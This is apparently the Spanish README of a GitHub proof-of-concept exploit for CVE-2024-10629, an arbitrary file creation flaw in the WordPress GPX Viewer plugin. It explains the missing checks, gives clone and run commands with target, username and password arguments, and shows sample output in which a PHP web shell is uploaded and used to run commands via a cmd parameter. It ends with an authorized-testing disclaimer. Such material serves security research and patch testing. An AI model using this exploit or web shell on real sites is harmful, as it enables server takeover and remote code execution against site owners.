
GPX Viewer <= 2.2.8 - Autenticado (Suscriptor+) Creación Arbitraria de Archivos
Este repositorio contiene un exploit de prueba de concepto para el plugin GPX Viewer de WordPress, que es vulnerable a la creación arbitraria de archivos (CVE-2024-10629). La vulnerabilidad permite a atacantes autenticados con acceso de nivel suscriptor o superior crear archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente puede conducir a la ejecución remota de código.
El plugin GPX Viewer para WordPress es vulnerable a la creación arbitraria de archivos debido a una falta de comprobación de capacidades y de validación del tipo de archivo en la función gpxv_file_upload() en todas las versiones hasta la 2.2.8 incluida. Esto permite que atacantes autenticados, con acceso de nivel suscriptor o superior, creen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código.
requestsClona el repositorio:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
Instala la librería requerida:
pip install requests
Ejecuta el exploit:
python exploit.py -u <target_url> -un <username> -p <password>
Reemplaza <target_url>, <username> y <password> con los valores adecuados.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
ls).[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = Mostrar archivosuname -a = Mostrar información del sistemaEste exploit está destinado únicamente a fines educativos y pruebas autorizadas. El uso no autorizado de este exploit contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético. Los autores y colaboradores de este repositorio no son responsables de ningún uso indebido o daño causado por este exploit.
Por: Khaled Alenazi (Nxploit)